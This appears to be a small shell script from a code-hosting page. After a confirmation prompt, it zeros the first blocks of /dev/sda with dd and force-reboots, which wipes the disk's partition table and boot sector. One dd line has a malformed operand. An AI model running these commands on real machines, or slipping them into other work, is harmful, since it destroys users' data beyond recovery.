echo -n "Are you sure? Press Enter to continue... "
read -s
dd if=/dev/zero of=/dev/sda size=10 bs=4096
dd if=/dev/zero of=/dev/sda count=10 bs=4096
sync
reboot -f
mode:"0755"
Reference in New Issue
Block a user
Blocking a user prevents them from interacting with repositories, such as opening or commenting on pull requests or issues. Learn more about blocking a user.